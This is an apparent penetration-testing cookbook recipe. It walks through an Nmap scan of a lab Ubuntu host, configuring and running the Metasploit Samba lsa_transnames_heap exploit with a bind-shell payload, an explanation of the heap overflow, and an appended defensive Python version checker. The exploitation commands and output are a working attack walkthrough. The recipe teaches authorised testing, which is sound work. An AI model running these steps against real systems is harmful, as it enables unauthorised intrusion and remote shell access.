
Exploiting a Linux (Ubuntu) machine

Linux is also one of the most widely used operating systems after Windows. In the previous few recipes, we saw how to penetrate a Windows machine by exploiting critical flaws in available services. In this recipe, we will deal with the Linux operating system. We will be

Getting ready

We will start by scanning our target Linux machine to gather information about the available services. Let us perform a quick Nmap scan and analyze its result:

msf > nmap -sT 192.168.56.101
[*] exec: nmap 192.168.56.101

Starting Nmap 5.20 ( http://nmap.org ) at 2011-11-05 13:35 IST
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.56.101
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ )

So now, we have gathered information about the target. Our next step will be to select an exploit and a suitable payload for it.

How to do it...

The process of penetrating into a Linux machine is similar to that of Windows:

1. All we have to focus on is selecting the right exploit and payload. Let us search for any Samba exploit available in the Metasploit directory:

msf > search Samba

2. The previous command will provide a list of various auxiliary and exploit modules for Samba. We will use the exploit/linux/samba/lsa_transnames_heap module, which is listed with a good rank, so it has a higher probability of working against the target. Let us set the exploit as active and set up its parameters:

msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

msf exploit(lsa_transnames_heap) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(lsa_transnames_heap) >

3. Now, our next task is to select a payload. We have to keep one thing in mind: as we are targeting a Linux machine, we must select a Linux payload for our penetration process. We will use the linux/x86/shell_bind_tcp payload, which works similarly to the bind_tcp payload we analyzed in the previous recipes for Windows:

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  LSARPC           yes       The pipe name to use

Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.56.101   no        The target address

4. We are all set now and our final step will be to provide the exploit command to begin the process of exploitation:

msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...

Upon successful execution of the exploit, we are provided with a shell on the target machine. The process is very similar to the ones discussed in previous recipes; the only difference lies in selecting exploits and payloads. The more combinations of exploits and payloads you try, the better your understanding of them will be.

How it works...

Let us go through a quick note about the service, its exploit, and how it works. Samba is used for printers and file sharing between Linux and Windows machines. This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the talloc chunk overwrite method (credit Ramon and Adriano), which only works with Samba Versions 3.0.21 and 3.0.24. The exploit takes advantage of dynamic memory allocation in heaps. There are

Talloc is a hierarchical memory allocator: every talloc chunk is a potential parent of other talloc chunks. The Samba lsa_io_trans_names Heap Overflow module triggers a heap overflow in the LSA RPC service of the Samba daemon, using the talloc chunk overwrite method, which only works with Samba Versions 3.0.21 and 3.0.24.

Additionally, this module will not work when the Samba log level parameter is higher than 2.

There's more...

Let us cover some more relevant modules related to the Linux operating system.

Other relevant exploit modules for Linux

Apart from the exploit module discussed in this recipe, there are two more modules which deserve some attention. It is highly recommended that you try these exploits manually to understand them better. They are as follows:

- Samba chain_reply Memory Corruption: This exploit works by corrupting the memory allocated to the response packets in Samba versions prior to 3.3.13. The corruption is triggered by passing a value larger than the destination buffer size.

- Samba trans2open Overflow: This is a buffer overflow vulnerability in Samba Versions 2.2.0 to 2.2.8. It works by exploiting the flaw on x86 Linux machines that do not have the noexec stack option set.
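As an added example (not from the recipe and not Metasploit code), here is a defender-side check in Python that ties the scan in "Getting ready" to the version ranges given in "How it works..." and in the list above: it parses Nmap service lines, extracts the reported Samba version and maps it onto those ranges, treating "3.0.21 and 3.0.24" as the range 3.0.21 through 3.0.24. A partially resolved version such as the "3.X" the scan reported is flagged as unresolved rather than as clean. Function names and the sample scan lines are my own.

```python
import re

# Affected Samba ranges as the recipe states them, as [low, high) tuples;
# chain_reply is given only an upper bound on the page ("prior to 3.3.13").
SAMBA_ISSUES = {
    "lsa_transnames_heap (talloc chunk overwrite)": ((3, 0, 21), (3, 0, 25)),
    "chain_reply memory corruption": ((0,), (3, 3, 13)),
    "trans2open overflow": ((2, 2, 0), (2, 2, 9)),
}
# Nmap -sV service lines such as "445/tcp open netbios-ssn Samba smbd 3.X (...)"
NMAP_SAMBA_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+Samba smbd\s+(\S+)")
# Constructed sample, shaped like the scan output shown in the recipe.
SAMPLE_NMAP = """\
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
"""
def parse_version(text):
    """Numeric prefix of a version string: "3.0.24" -> (3, 0, 24), "3.X" -> (3,)."""
    parts = []
    for piece in text.split("."):
        if not piece.isdigit():
            break  # stop at the first unresolved component (the "X" in "3.X")
        parts.append(int(piece))
    return tuple(parts)

def exposure(version_text):
    """Return (exact, sorted issue names). exact is False for a prefix such as "3.X";
    the list then holds every issue whose range overlaps that prefix, so an
    unresolved version is reported as needing verification, never as clean."""
    prefix = parse_version(version_text)
    exact = all(piece.isdigit() for piece in version_text.split("."))
    if not prefix:  # nothing numeric at all: every issue remains possible
        return False, sorted(SAMBA_ISSUES)
    upper = prefix[:-1] + (prefix[-1] + 1,)  # first version beyond the prefix
    hits = [name for name, (low, high) in SAMBA_ISSUES.items()
            if low < upper and high > prefix]
    return exact, sorted(hits)

def scan_nmap_output(lines):
    """Return (port, version, exact, issues) for every Samba line in Nmap output."""
    findings = []
    for line in lines:
        m = NMAP_SAMBA_RE.match(line.strip())
        if m:
            exact, issues = exposure(m.group(2))
            findings.append((int(m.group(1)), m.group(2), exact, issues))
    return findings

if __name__ == "__main__":
    for port, version, exact, issues in scan_nmap_output(SAMPLE_NMAP.splitlines()):
        print(f"tcp/{port} Samba {version}: {'affected' if exact else 'unresolved, verify on the host'}: {issues or 'none'}")
```

Because the recipe's scan only resolved "3.X", the script reports the host as unresolved for both 3.0.x modules; the version has to be confirmed on the host (or by a patch inventory) before it is treated as clean.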

Understanding the Windows DLL injection